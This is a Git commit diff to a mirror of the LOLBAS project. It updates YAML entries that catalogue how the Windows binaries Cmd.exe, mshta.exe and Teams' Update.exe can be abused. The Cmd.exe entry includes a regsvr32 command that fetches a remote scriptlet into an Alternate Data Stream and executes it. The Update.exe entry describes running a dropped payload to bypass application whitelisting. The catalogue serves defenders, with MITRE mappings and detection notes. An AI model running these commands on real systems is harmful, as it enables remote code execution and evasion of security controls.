mirror of
https://github.com/LOLBAS-Project/LOLBAS
synced 2024-12-26 14:59:03 +01:00
Adjusted new contributions
This commit is contained in:
parent
95e37b7cbf
commit
285e4d78d8
@ -1,19 +1,24 @@
|
|||||||
|
---
|
||||||
Name: Cmd.exe
|
Name: Cmd.exe
|
||||||
Description: The command-line interpreter in Windows
|
Description: The command-line interpreter in Windows
|
||||||
Author: 'Ye Yint Min Thu Htut'
|
Author: 'Ye Yint Min Thu Htut'
|
||||||
Created: '2019-06-26'
|
Created: '2019-06-26'
|
||||||
Commands:
|
Commands:
|
||||||
- Command: cmd.exe /c echo regsvr32.exe ^/s ^/u ^/i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct ^scrobj.dll > fakefile.doc:payload.bat
|
- Command: cmd.exe /c echo regsvr32.exe ^/s ^/u ^/i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct ^scrobj.dll > fakefile.doc:payload.bat
|
||||||
Description: To add content in an Alternate Data Stream (ADS).
|
Description: Add content to an Alternate Data Stream (ADS).
|
||||||
|
|
||||||
Command: cmd.exe - < fakefile.doc:payload.bat
|
|
||||||
Description: Execute payload.bat which is stored in an Alternate Data Stream (ADS).
|
|
||||||
|
|
||||||
Usecase: Can be used to evade defensive countermeasures or to hide as a persistence mechanism
|
Usecase: Can be used to evade defensive countermeasures or to hide as a persistence mechanism
|
||||||
Category: ADS
|
Category: ADS
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T
|
MitreID: T1170
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1170
|
||||||
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
|
- Command: cmd.exe - < fakefile.doc:payload.bat
|
||||||
|
Description: Execute payload.bat stored in an Alternate Data Stream (ADS).
|
||||||
|
Usecase: Can be used to evade defensive countermeasures or to hide as a persistence mechanism
|
||||||
|
Category: ADS
|
||||||
|
Privileges: User
|
||||||
|
MitreID: T1170
|
||||||
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1170
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\cmd.exe
|
- Path: C:\Windows\System32\cmd.exe
|
||||||
|
@ -35,7 +35,7 @@ Commands:
|
|||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1170
|
MitreID: T1170
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1170
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1170
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 (Does not work on 1903 and newer)
|
||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\mshta.exe
|
- Path: C:\Windows\System32\mshta.exe
|
||||||
- Path: C:\Windows\SysWOW64\mshta.exe
|
- Path: C:\Windows\SysWOW64\mshta.exe
|
||||||
|
@ -1,25 +1,32 @@
|
|||||||
---
|
---
|
||||||
Name: Update.exe
|
Name: Update.exe
|
||||||
Description: Update is the squirrel update utility used by Microsoft Electron app (Teams in this case)
|
Description: Update is the squirrel update utility used by Microsoft Electron app (Teams in this case)
|
||||||
Author: Mr.Un1k0d3r
|
Author: 'Mr.Un1k0d3r'
|
||||||
Created: 2019-06-26
|
Created: '2019-06-26'
|
||||||
Commands:
|
Commands:
|
||||||
- Command: Copy your payload into `%userprofile%\AppData\Local\Microsoft\Teams\current\`. Then run the following command `%userprofile%\AppData\Local\Microsoft\Teams\Update.exe --processStart payload.exe --process-start-args "whatever args"`
|
- Command: Update.exe --processStart payload.exe --process-start-args "whatever args"
|
||||||
Description: The Update.exe will execute the file you copied into the current folder.
|
Description: Copy your payload into %userprofile%\AppData\Local\Microsoft\Teams\current\. Then run the command. Update.exe will execute the file you copied.
|
||||||
Usecase: Application Whitelisting Bypass
|
Usecase: Application Whitelisting Bypass
|
||||||
Category: AWL Bypass
|
Category: AWL Bypass
|
||||||
Privileges: user privs
|
Privileges: User
|
||||||
MitreID: T1033
|
MitreID: T1218
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1033
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||||
|
OperatingSystem: Windows 7 and up with Microsoft Teams installed
|
||||||
|
- Command: Update.exe --processStart payload.exe --process-start-args "whatever args"
|
||||||
|
Description: Copy your payload into %userprofile%\AppData\Local\Microsoft\Teams\current\. Then run the command. Update.exe will execute the file you copied.
|
||||||
|
Usecase: Execute binary
|
||||||
|
Category: Execute
|
||||||
|
Privileges: User
|
||||||
|
MitreID: T1218
|
||||||
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||||
OperatingSystem: Windows 7 and up with Microsoft Teams installed
|
OperatingSystem: Windows 7 and up with Microsoft Teams installed
|
||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: %userprofile%\AppData\Local\Microsoft\Teams\Update.exe
|
- Path: '%userprofile%\AppData\Local\Microsoft\Teams\Update.exe'
|
||||||
|
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: Update.exe spawned an unknown process
|
- IOC: Update.exe spawned an unknown process
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://twitter.com/MrUn1k0d3r/status/1143928885211537408
|
- Link: https://twitter.com/MrUn1k0d3r/status/1143928885211537408
|
||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
- Person: Mr.Un1k0d3r
|
- Person: Mr.Un1k0d3r
|
||||||
Handle: @MrUn1k0d3r
|
Handle: '@MrUn1k0d3r'
|
||||||
---
|
---
|
||||||
|
Loading…
Reference in New Issue
Block a user